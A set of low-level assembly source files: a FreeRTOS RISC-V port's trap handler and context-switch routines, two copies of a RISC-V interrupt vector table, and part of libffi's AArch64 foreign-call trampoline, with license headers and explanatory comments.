#ifdef portasmHAS_CLINT
#warning The portasmHAS_CLINT constant has been deprecated. Please replace it with portasmHAS_MTIME and portasmHAS_SIFIVE_CLINT. For now portasmHAS_MTIME and portasmHAS_SIFIVE_CLINT are derived from portasmHAS_CLINT. See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#define portasmHAS_MTIME portasmHAS_CLINT
#define portasmHAS_SIFIVE_CLINT portasmHAS_CLINT
#endif
#ifndef portasmHAS_MTIME
#error freertos_risc_v_chip_specific_extensions.h must define portasmHAS_MTIME to either 1 (MTIME clock present) or 0 (MTIME clock not present). See https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
#ifndef portasmHANDLE_INTERRUPT
#error portasmHANDLE_INTERRUPT must be defined to the function to be called to handle external/peripheral interrupts. portasmHANDLE_INTERRUPT can be defined on the assembler command line or in the appropriate freertos_risc_v_chip_specific_extensions.h header file. https://www.FreeRTOS.org/Using-FreeRTOS-on-RISC-V.html
#endif
#ifndef portasmHAS_SIFIVE_CLINT
#define portasmHAS_SIFIVE_CLINT 0
#endif
/* Only the standard core registers are stored by default. Any additional
registers must be saved by the portasmSAVE_ADDITIONAL_REGISTERS and
portasmRESTORE_ADDITIONAL_REGISTERS macros - which can be defined in a chip
specific version of freertos_risc_v_chip_specific_extensions.h. See the notes
at the top of this file. */
#define portCONTEXT_SIZE ( 30 * portWORD_SIZE )
.global xPortStartFirstTask
.global freertos_risc_v_trap_handler
.global pxPortInitialiseStack
.extern pxCurrentTCB
.extern ulPortTrapHandler
.extern vTaskSwitchContext
.extern xTaskIncrementTick
.extern Timer_IRQHandler
.extern pullMachineTimerCompareRegister
.extern pullNextTime
.extern uxTimerIncrementsForOneTick /* size_t type so 32-bit on 32-bit core and 64-bits on 64-bit core. */
.extern xISRStackTop
.extern portasmHANDLE_INTERRUPT
/*-----------------------------------------------------------*/
.align 8
.func
/*
 * Central machine-mode trap handler (installed into mtvec by
 * xPortStartFirstTask when portasmHAS_SIFIVE_CLINT != 0).
 * Saves the full task context onto the current task's stack, records sp
 * into the first member of pxCurrentTCB, then dispatches on mcause:
 *   - machine timer interrupt    -> update mtimecmp, xTaskIncrementTick
 *   - machine external interrupt -> portasmHANDLE_INTERRUPT
 *   - environment call (11)      -> vTaskSwitchContext (a yield)
 * Finally restores the context of whichever task pxCurrentTCB points to
 * at that moment and returns with mret.
 */
freertos_risc_v_trap_handler:
addi sp, sp, -portCONTEXT_SIZE
store_x x1, 1 * portWORD_SIZE( sp ) /* ra */
store_x x5, 2 * portWORD_SIZE( sp ) /* t0 */
store_x x6, 3 * portWORD_SIZE( sp ) /* t1 */
store_x x7, 4 * portWORD_SIZE( sp ) /* t2 */
store_x x8, 5 * portWORD_SIZE( sp ) /* s0/fp */
store_x x9, 6 * portWORD_SIZE( sp ) /* s1 */
store_x x10, 7 * portWORD_SIZE( sp ) /* a0 */
store_x x11, 8 * portWORD_SIZE( sp ) /* a1 */
store_x x12, 9 * portWORD_SIZE( sp ) /* a2 */
store_x x13, 10 * portWORD_SIZE( sp ) /* a3 */
store_x x14, 11 * portWORD_SIZE( sp ) /* a4 */
store_x x15, 12 * portWORD_SIZE( sp ) /* a5 */
store_x x16, 13 * portWORD_SIZE( sp ) /* a6 */
store_x x17, 14 * portWORD_SIZE( sp ) /* a7 */
store_x x18, 15 * portWORD_SIZE( sp ) /* s2 */
store_x x19, 16 * portWORD_SIZE( sp ) /* s3 */
store_x x20, 17 * portWORD_SIZE( sp ) /* s4 */
store_x x21, 18 * portWORD_SIZE( sp ) /* s5 */
store_x x22, 19 * portWORD_SIZE( sp ) /* s6 */
store_x x23, 20 * portWORD_SIZE( sp ) /* s7 */
store_x x24, 21 * portWORD_SIZE( sp ) /* s8 */
store_x x25, 22 * portWORD_SIZE( sp ) /* s9 */
store_x x26, 23 * portWORD_SIZE( sp ) /* s10 */
store_x x27, 24 * portWORD_SIZE( sp ) /* s11 */
store_x x28, 25 * portWORD_SIZE( sp ) /* t3 */
store_x x29, 26 * portWORD_SIZE( sp ) /* t4 */
store_x x30, 27 * portWORD_SIZE( sp ) /* t5 */
store_x x31, 28 * portWORD_SIZE( sp ) /* t6 */
csrr t0, mstatus /* Required for MPIE bit. */
store_x t0, 29 * portWORD_SIZE( sp )
portasmSAVE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to save any registers unique to the RISC-V implementation. */
load_x t0, pxCurrentTCB /* Load pxCurrentTCB. */
store_x sp, 0( t0 ) /* Write sp to first TCB member. */
csrr a0, mcause
csrr a1, mepc
test_if_asynchronous:
srli a2, a0, __riscv_xlen - 1 /* MSB of mcause is 1 if handling an asynchronous interrupt - shift to LSB to clear other bits. */
beq a2, x0, handle_synchronous /* Branch past interrupt handling if not asynchronous. */
store_x a1, 0( sp ) /* Asynch so save unmodified exception return address. */
handle_asynchronous:
#if( portasmHAS_MTIME != 0 )
test_if_mtimer: /* If there is a CLINT then the mtimer is used to generate the tick interrupt. */
addi t0, x0, 1
slli t0, t0, __riscv_xlen - 1 /* LSB is already set, shift into MSB. Shift 31 on 32-bit or 63 on 64-bit cores. */
addi t1, t0, 7 /* 0x8000[]0007 == machine timer interrupt. */
bne a0, t1, test_if_external_interrupt
load_x t0, pullMachineTimerCompareRegister /* Load address of compare register into t0. */
load_x t1, pullNextTime /* Load the address of ullNextTime into t1. */
#if( __riscv_xlen == 32 )
/* Update the 64-bit mtimer compare match value in two 32-bit writes. */
li t4, -1
lw t2, 0(t1) /* Load the low word of ullNextTime into t2. */
lw t3, 4(t1) /* Load the high word of ullNextTime into t3. */
sw t4, 0(t0) /* Low word no smaller than old value to start with - will be overwritten below. */
sw t3, 4(t0) /* Store high word of ullNextTime into compare register. No smaller than new value. */
sw t2, 0(t0) /* Store low word of ullNextTime into compare register. */
lw t0, uxTimerIncrementsForOneTick /* Load the value of ullTimerIncrementForOneTick into t0 (could this be optimized by storing in an array next to pullNextTime?). */
add t4, t0, t2 /* Add the low word of ullNextTime to the timer increments for one tick (assumes timer increment for one tick fits in 32-bits). */
sltu t5, t4, t2 /* See if the sum of low words overflowed (what about the zero case?). */
add t6, t3, t5 /* Add overflow to high word of ullNextTime. */
sw t4, 0(t1) /* Store new low word of ullNextTime. */
sw t6, 4(t1) /* Store new high word of ullNextTime. */
#endif /* __riscv_xlen == 32 */
#if( __riscv_xlen == 64 )
/* Update the 64-bit mtimer compare match value. */
ld t2, 0(t1) /* Load ullNextTime into t2. */
sd t2, 0(t0) /* Store ullNextTime into compare register. */
ld t0, uxTimerIncrementsForOneTick /* Load the value of ullTimerIncrementForOneTick into t0 (could this be optimized by storing in an array next to pullNextTime?). */
add t4, t0, t2 /* Add ullNextTime to the timer increments for one tick. */
sd t4, 0(t1) /* Store ullNextTime. */
#endif /* __riscv_xlen == 64 */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal xTaskIncrementTick
beqz a0, processed_source /* Don't switch context if incrementing tick didn't unblock a task. */
jal vTaskSwitchContext
j processed_source
test_if_external_interrupt: /* If there is a CLINT and the mtimer interrupt is not pending then check to see if an external interrupt is pending. */
addi t1, t1, 4 /* 0x80000007 + 4 = 0x8000000b == Machine external interrupt. */
bne a0, t1, as_yet_unhandled /* Something as yet unhandled. */
#endif /* portasmHAS_MTIME */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal portasmHANDLE_INTERRUPT /* Jump to the interrupt handler if there is no CLINT or if there is a CLINT and it has been determined that an external interrupt is pending. */
j processed_source
handle_synchronous:
addi a1, a1, 4 /* Synchronous so update exception return address to the instruction after the instruction that generated the exception. */
store_x a1, 0( sp ) /* Save updated exception return address. */
test_if_environment_call:
li t0, 11 /* 11 == environment call. */
bne a0, t0, is_exception /* Not an M environment call, so some other exception. */
load_x sp, xISRStackTop /* Switch to ISR stack before function call. */
jal vTaskSwitchContext
j processed_source
is_exception:
csrr t0, mcause /* For viewing in the debugger only. */
csrr t1, mepc /* For viewing in the debugger only */
csrr t2, mstatus
j is_exception /* No other exceptions handled yet - deliberate infinite loop so the debugger halts here. */
as_yet_unhandled:
csrr t0, mcause /* For viewing in the debugger only. */
j as_yet_unhandled /* Deliberate infinite loop for unhandled interrupt causes. */
processed_source:
load_x t1, pxCurrentTCB /* Load pxCurrentTCB. */
load_x sp, 0( t1 ) /* Read sp from first TCB member. */
/* Load mret with the address of the next instruction in the task to run next. */
load_x t0, 0( sp )
csrw mepc, t0
portasmRESTORE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to restore any registers unique to the RISC-V implementation. */
/* Load mstatus with the interrupt enable bits used by the task. */
load_x t0, 29 * portWORD_SIZE( sp )
csrw mstatus, t0 /* Required for MPIE bit. */
load_x x1, 1 * portWORD_SIZE( sp )
load_x x5, 2 * portWORD_SIZE( sp ) /* t0 */
load_x x6, 3 * portWORD_SIZE( sp ) /* t1 */
load_x x7, 4 * portWORD_SIZE( sp ) /* t2 */
load_x x8, 5 * portWORD_SIZE( sp ) /* s0/fp */
load_x x9, 6 * portWORD_SIZE( sp ) /* s1 */
load_x x10, 7 * portWORD_SIZE( sp ) /* a0 */
load_x x11, 8 * portWORD_SIZE( sp ) /* a1 */
load_x x12, 9 * portWORD_SIZE( sp ) /* a2 */
load_x x13, 10 * portWORD_SIZE( sp ) /* a3 */
load_x x14, 11 * portWORD_SIZE( sp ) /* a4 */
load_x x15, 12 * portWORD_SIZE( sp ) /* a5 */
load_x x16, 13 * portWORD_SIZE( sp ) /* a6 */
load_x x17, 14 * portWORD_SIZE( sp ) /* a7 */
load_x x18, 15 * portWORD_SIZE( sp ) /* s2 */
load_x x19, 16 * portWORD_SIZE( sp ) /* s3 */
load_x x20, 17 * portWORD_SIZE( sp ) /* s4 */
load_x x21, 18 * portWORD_SIZE( sp ) /* s5 */
load_x x22, 19 * portWORD_SIZE( sp ) /* s6 */
load_x x23, 20 * portWORD_SIZE( sp ) /* s7 */
load_x x24, 21 * portWORD_SIZE( sp ) /* s8 */
load_x x25, 22 * portWORD_SIZE( sp ) /* s9 */
load_x x26, 23 * portWORD_SIZE( sp ) /* s10 */
load_x x27, 24 * portWORD_SIZE( sp ) /* s11 */
load_x x28, 25 * portWORD_SIZE( sp ) /* t3 */
load_x x29, 26 * portWORD_SIZE( sp ) /* t4 */
load_x x30, 27 * portWORD_SIZE( sp ) /* t5 */
load_x x31, 28 * portWORD_SIZE( sp ) /* t6 */
addi sp, sp, portCONTEXT_SIZE
mret
.endfunc
/*-----------------------------------------------------------*/
.align 8
.func
/*
 * Starts the scheduler by restoring the context of the task pointed to
 * by pxCurrentTCB and "returning" into it with ret - x1 (ra) is loaded
 * from the task's stacked exception return address (pxCode), so ret
 * transfers control to the task entry point with interrupts enabled.
 */
xPortStartFirstTask:
#if( portasmHAS_SIFIVE_CLINT != 0 )
/* If there is a clint then interrupts can branch directly to the FreeRTOS
trap handler. Otherwise the interrupt controller will need to be configured
outside of this file. */
la t0, freertos_risc_v_trap_handler
csrw mtvec, t0
#endif /* portasmHAS_SIFIVE_CLINT */
load_x sp, pxCurrentTCB /* Load pxCurrentTCB. */
load_x sp, 0( sp ) /* Read sp from first TCB member. */
load_x x1, 0( sp ) /* Note for starting the scheduler the exception return address is used as the function return address. */
portasmRESTORE_ADDITIONAL_REGISTERS /* Defined in freertos_risc_v_chip_specific_extensions.h to restore any registers unique to the RISC-V implementation. */
load_x x6, 3 * portWORD_SIZE( sp ) /* t1 */
load_x x7, 4 * portWORD_SIZE( sp ) /* t2 */
load_x x8, 5 * portWORD_SIZE( sp ) /* s0/fp */
load_x x9, 6 * portWORD_SIZE( sp ) /* s1 */
load_x x10, 7 * portWORD_SIZE( sp ) /* a0 */
load_x x11, 8 * portWORD_SIZE( sp ) /* a1 */
load_x x12, 9 * portWORD_SIZE( sp ) /* a2 */
load_x x13, 10 * portWORD_SIZE( sp ) /* a3 */
load_x x14, 11 * portWORD_SIZE( sp ) /* a4 */
load_x x15, 12 * portWORD_SIZE( sp ) /* a5 */
load_x x16, 13 * portWORD_SIZE( sp ) /* a6 */
load_x x17, 14 * portWORD_SIZE( sp ) /* a7 */
load_x x18, 15 * portWORD_SIZE( sp ) /* s2 */
load_x x19, 16 * portWORD_SIZE( sp ) /* s3 */
load_x x20, 17 * portWORD_SIZE( sp ) /* s4 */
load_x x21, 18 * portWORD_SIZE( sp ) /* s5 */
load_x x22, 19 * portWORD_SIZE( sp ) /* s6 */
load_x x23, 20 * portWORD_SIZE( sp ) /* s7 */
load_x x24, 21 * portWORD_SIZE( sp ) /* s8 */
load_x x25, 22 * portWORD_SIZE( sp ) /* s9 */
load_x x26, 23 * portWORD_SIZE( sp ) /* s10 */
load_x x27, 24 * portWORD_SIZE( sp ) /* s11 */
load_x x28, 25 * portWORD_SIZE( sp ) /* t3 */
load_x x29, 26 * portWORD_SIZE( sp ) /* t4 */
load_x x30, 27 * portWORD_SIZE( sp ) /* t5 */
load_x x31, 28 * portWORD_SIZE( sp ) /* t6 */
load_x x5, 29 * portWORD_SIZE( sp ) /* Initial mstatus into x5 (t0) */
addi x5, x5, 0x08 /* Set MIE bit so the first task starts with interrupts enabled - required as returns with ret not eret. */
csrrw x0, mstatus, x5 /* Interrupts enabled from here! */
load_x x5, 2 * portWORD_SIZE( sp ) /* Initial x5 (t0) value. */
addi sp, sp, portCONTEXT_SIZE
ret
.endfunc
/*-----------------------------------------------------------*/
/*
* Unlike other ports pxPortInitialiseStack() is written in assembly code as it
* needs access to the portasmADDITIONAL_CONTEXT_SIZE constant. The prototype
* for the function is as per the other ports:
* StackType_t *pxPortInitialiseStack( StackType_t *pxTopOfStack, TaskFunction_t pxCode, void *pvParameters );
*
* As per the standard RISC-V ABI pxTopOfStack is passed in a0, pxCode in
* a1, and pvParameters in a2. The new top of stack is passed out in a0.
*
* RISC-V maps registers to ABI names as follows (X1 to X31 integer registers
* for the 'I' profile, X1 to X15 for the 'E' profile, currently I assumed).
*
* Register ABI Name Description Saver
* x0 zero Hard-wired zero -
* x1 ra Return address Caller
* x2 sp Stack pointer Callee
* x3 gp Global pointer -
* x4 tp Thread pointer -
* x5-7 t0-2 Temporaries Caller
* x8 s0/fp Saved register/Frame pointer Callee
* x9 s1 Saved register Callee
* x10-11 a0-1 Function Arguments/return values Caller
* x12-17 a2-7 Function arguments Caller
* x18-27 s2-11 Saved registers Callee
* x28-31 t3-6 Temporaries Caller
*
* The RISC-V context is saved to FreeRTOS tasks in the following stack frame,
* where the global and thread pointers are currently assumed to be constant so
* are not saved:
*
* mstatus
* x31
* x30
* x29
* x28
* x27
* x26
* x25
* x24
* x23
* x22
* x21
* x20
* x19
* x18
* x17
* x16
* x15
* x14
* x13
* x12
* x11
* pvParameters
* x9
* x8
* x7
* x6
* x5
* portTASK_RETURN_ADDRESS
* [chip specific registers go here]
* pxCode
*/
.align 8
.func
/*
 * StackType_t *pxPortInitialiseStack( StackType_t *pxTopOfStack,
 *                                     TaskFunction_t pxCode,
 *                                     void *pvParameters );
 * In:  a0 = pxTopOfStack, a1 = pxCode, a2 = pvParameters.
 * Out: a0 = new top of stack after the initial frame has been built
 *      (frame layout is documented in the comment block above).
 */
pxPortInitialiseStack:
csrr t0, mstatus /* Obtain current mstatus value. */
andi t0, t0, ~0x8 /* Ensure interrupts are disabled when the stack is restored within an ISR. Required when a task is created after the scheduler has been started, otherwise interrupts would be disabled anyway. */
addi t1, x0, 0x188 /* Generate the value 0x1880, which are the MPIE and MPP bits to set in mstatus. */
slli t1, t1, 4
or t0, t0, t1 /* Set MPIE and MPP bits in mstatus value. */
addi a0, a0, -portWORD_SIZE
store_x t0, 0(a0) /* mstatus onto the stack. */
addi a0, a0, -(22 * portWORD_SIZE) /* Space for registers x11-x31. */
store_x a2, 0(a0) /* Task parameters (pvParameters parameter) goes into register X10/a0 on the stack. */
addi a0, a0, -(6 * portWORD_SIZE) /* Space for registers x5-x9. */
store_x x0, 0(a0) /* Return address onto the stack, could be portTASK_RETURN_ADDRESS */
addi t0, x0, portasmADDITIONAL_CONTEXT_SIZE /* The number of chip specific additional registers. */
chip_specific_stack_frame: /* First add any chip specific registers to the stack frame being created. */
beq t0, x0, 1f /* No more chip specific registers to save. */
addi a0, a0, -portWORD_SIZE /* Make space for chip specific register. */
store_x x0, 0(a0) /* Give the chip specific register an initial value of zero. */
addi t0, t0, -1 /* Decrement the count of chip specific registers remaining. */
j chip_specific_stack_frame /* Until no more chip specific registers. */
1:
addi a0, a0, -portWORD_SIZE
store_x a1, 0(a0) /* mret value (pxCode parameter) onto the stack. */
ret
.endfunc
/*-----------------------------------------------------------*/
|
aignacio/nox
| 3,310
|
sw/soc_hello_world/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
# trap_entry: common trap prologue. Saves every RISC-V caller-saved
# integer register so the C ISR invoked via `jal` below may clobber
# them freely; callee-saved registers (s0-s11) are preserved by the
# C calling convention and need no storage here.
.macro trap_entry
# Allocate space on the stack; we need to save the
# context of 16 32-bit registers, which equals
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
# trap_exit: common trap epilogue. Restores the registers stored by
# trap_entry (same offsets, same order), releases the 64-byte frame,
# and returns from the trap with mret.
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...then deallocate the stack space and return
addi sp, sp, 64
# from the trap with mret
mret
.endm
.option norvc # compressed instructions disabled so every vector slot below is exactly 4 bytes
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will jump to on trap execution. In the code below we consider that
# vectored interrupts are activated (i.e. MTVEC[1:0] = 1), so an
# asynchronous trap with cause N enters at [Trap base] + 4*N, while
# every synchronous trap enters at [Trap base] itself.
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
# Handlers: each saves the caller-saved context (trap_entry), calls its
# C ISR, then restores the context and returns with mret (trap_exit).
_synctrap: # exceptions (synchronous traps)
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int: # machine software interrupt (cause 3)
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int: # machine timer interrupt (cause 7)
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int: # machine external interrupt (cause 11)
trap_entry
jal isr_m_external
trap_exit
|
aignacio/nox
| 3,310
|
sw/bootloader/init/vector.S
|
/**
* RISC-V bootup test
* Author: Daniele Lacamera <root@danielinux.net>
* Modified by: Anderson Ignacio <anderson@aignacio.com>
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
# trap_entry: common trap prologue. Saves every RISC-V caller-saved
# integer register so the C ISR invoked via `jal` below may clobber
# them freely; callee-saved registers (s0-s11) are preserved by the
# C calling convention and need no storage here.
.macro trap_entry
# Allocate space on the stack; we need to save the
# context of 16 32-bit registers, which equals
# 16*(4 bytes) = 64 bytes
addi sp, sp, -64
# Start saving the "Caller" registers in the stack
sw ra, 0(sp)
sw t0, 4(sp)
sw t1, 8(sp)
sw t2, 12(sp)
sw a0, 16(sp)
sw a1, 20(sp)
sw a2, 24(sp)
sw a3, 28(sp)
sw a4, 32(sp)
sw a5, 36(sp)
sw a6, 40(sp)
sw a7, 44(sp)
sw t3, 48(sp)
sw t4, 52(sp)
sw t5, 56(sp)
sw t6, 60(sp)
.endm
# trap_exit: common trap epilogue. Restores the registers stored by
# trap_entry (same offsets, same order), releases the 64-byte frame,
# and returns from the trap with mret.
.macro trap_exit
# We'll return from the trap entry, so we restore
# the context stored in the stack...
lw ra, 0(sp)
lw t0, 4(sp)
lw t1, 8(sp)
lw t2, 12(sp)
lw a0, 16(sp)
lw a1, 20(sp)
lw a2, 24(sp)
lw a3, 28(sp)
lw a4, 32(sp)
lw a5, 36(sp)
lw a6, 40(sp)
lw a7, 44(sp)
lw t3, 48(sp)
lw t4, 52(sp)
lw t5, 56(sp)
lw t6, 60(sp)
# ...then deallocate the stack space and return
addi sp, sp, 64
# from the trap with mret
mret
.endm
.option norvc # compressed instructions disabled so every vector slot below is exactly 4 bytes
.section .isr_vector
# In this section we're going to list all PC addresses that the hardware
# will jump to on trap execution. In the code below we consider that
# vectored interrupts are activated (i.e. MTVEC[1:0] = 1), so an
# asynchronous trap with cause N enters at [Trap base] + 4*N, while
# every synchronous trap enters at [Trap base] itself.
# synchronous trap = exceptions
# asynchronous trap = interrupts
.align 8 # Align to the next 2^8=256 bytes, or 0x100 offset address
trap_vectors:
j _synctrap # Base trap address (also sync trap address)
nop
nop
j trap_machine_software_int # MTVEC = [Trap base] + 0x4*3 = 0x0C
nop
nop
nop
j trap_machine_timer_int # MTVEC = [Trap base] + 0x4*7 = 0x1C
nop
nop
nop
j trap_machine_external_int # MTVEC = [Trap base] + 0x4*11 = 0x2C
.align 2
# Handlers: each saves the caller-saved context (trap_entry), calls its
# C ISR, then restores the context and returns with mret (trap_exit).
_synctrap: # exceptions (synchronous traps)
trap_entry
jal isr_synctrap
trap_exit
trap_machine_software_int: # machine software interrupt (cause 3)
trap_entry
jal isr_m_software
trap_exit
trap_machine_timer_int: # machine timer interrupt (cause 7)
trap_entry
jal isr_m_timer
trap_exit
trap_machine_external_int: # machine external interrupt (cause 11)
trap_entry
jal isr_m_external
trap_exit
|
aimardcr/APKKiller
| 11,155
|
app/src/main/cpp/whale/src/libffi/aarch64/sysv_arm64.S
|
#if defined(__aarch64__)
/* Copyright (c) 2009, 2010, 2011, 2012 ARM Ltd.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "internal.h"
#ifdef HAVE_MACHINE_ASM_H
#include <machine/asm.h>
#else
#ifdef __USER_LABEL_PREFIX__
#define CONCAT1(a, b) CONCAT2(a, b)
#define CONCAT2(a, b) a ## b
/* Use the right prefix for global labels. */
#define CNAME(x) CONCAT1 (__USER_LABEL_PREFIX__, x)
#else
#define CNAME(x) x
#endif
#endif
#ifdef __AARCH64EB__
# define BE(X) X
#else
# define BE(X) 0
#endif
#ifdef __ILP32__
#define PTR_REG(n) w##n
#else
#define PTR_REG(n) x##n
#endif
#ifdef __ILP32__
#define PTR_SIZE 4
#else
#define PTR_SIZE 8
#endif
.text
.align 4
/* ffi_call_SYSV
extern void ffi_call_SYSV (void *stack, void *frame,
void (*fn)(void), void *rvalue,
int flags, void *closure);
Therefore on entry we have:
x0 stack
x1 frame
x2 fn
x3 rvalue
x4 flags
x5 closure
*/
cfi_startproc
/* Entry: x0 = prepared argument context (becomes sp), x1 = caller-allocated
   frame, x2 = fn, x3 = rvalue, x4 = flags, x5 = closure. Loads the argument
   registers from the context, calls fn, then stores the return value through
   x3 using the computed jump table below, indexed by flags & AARCH64_RET_MASK. */
CNAME(ffi_call_SYSV):
/* Use a stack frame allocated by our caller. */
cfi_def_cfa(x1, 32);
stp x29, x30, [x1]
mov x29, x1
mov sp, x0
cfi_def_cfa_register(x29)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
mov x9, x2 /* save fn */
mov x8, x3 /* install structure return */
#ifdef FFI_GO_CLOSURES
mov x18, x5 /* install static chain */
#endif
stp x3, x4, [x29, #16] /* save rvalue and flags */
/* Load the vector argument passing registers, if necessary. */
tbz w4, #AARCH64_FLAG_ARG_V_BIT, 1f
ldp q0, q1, [sp, #0]
ldp q2, q3, [sp, #32]
ldp q4, q5, [sp, #64]
ldp q6, q7, [sp, #96]
1:
/* Load the core argument passing registers, including
the structure return pointer. */
ldp x0, x1, [sp, #16*N_V_ARG_REG + 0]
ldp x2, x3, [sp, #16*N_V_ARG_REG + 16]
ldp x4, x5, [sp, #16*N_V_ARG_REG + 32]
ldp x6, x7, [sp, #16*N_V_ARG_REG + 48]
/* Deallocate the context, leaving the stacked arguments. */
add sp, sp, #CALL_CONTEXT_SIZE
blr x9 /* call fn */
ldp x3, x4, [x29, #16] /* reload rvalue and flags */
/* Partially deconstruct the stack frame. */
mov sp, x29
cfi_def_cfa_register (sp)
ldp x29, x30, [x29]
/* Save the return value as directed. */
adr x5, 0f
and w4, w4, #AARCH64_RET_MASK
add x5, x5, x4, lsl #3
br x5
/* Note that each table entry is 2 insns, and thus 8 bytes.
For integer data, note that we're storing into ffi_arg
and therefore we want to extend to 64 bits; these types
have two consecutive entries allocated for them.
The S4/S3, D4/D3 and Q4/Q3 entries deliberately fall through
into the S2/S1, D2/D1 and Q2/Q1 entries below them, and each
UINT/SINT entry falls through into the following reserved ret. */
.align 4
0: ret /* VOID */
nop
1: str x0, [x3] /* INT64 */
ret
2: stp x0, x1, [x3] /* INT128 */
ret
3: brk #1000 /* UNUSED */
ret
4: brk #1000 /* UNUSED */
ret
5: brk #1000 /* UNUSED */
ret
6: brk #1000 /* UNUSED */
ret
7: brk #1000 /* UNUSED */
ret
8: st4 { v0.s, v1.s, v2.s, v3.s }[0], [x3] /* S4 */
ret
9: st3 { v0.s, v1.s, v2.s }[0], [x3] /* S3 */
ret
10: stp s0, s1, [x3] /* S2 */
ret
11: str s0, [x3] /* S1 */
ret
12: st4 { v0.d, v1.d, v2.d, v3.d }[0], [x3] /* D4 */
ret
13: st3 { v0.d, v1.d, v2.d }[0], [x3] /* D3 */
ret
14: stp d0, d1, [x3] /* D2 */
ret
15: str d0, [x3] /* D1 */
ret
16: str q3, [x3, #48] /* Q4 */
nop
17: str q2, [x3, #32] /* Q3 */
nop
18: stp q0, q1, [x3] /* Q2 */
ret
19: str q0, [x3] /* Q1 */
ret
20: uxtb w0, w0 /* UINT8 */
str x0, [x3]
21: ret /* reserved */
nop
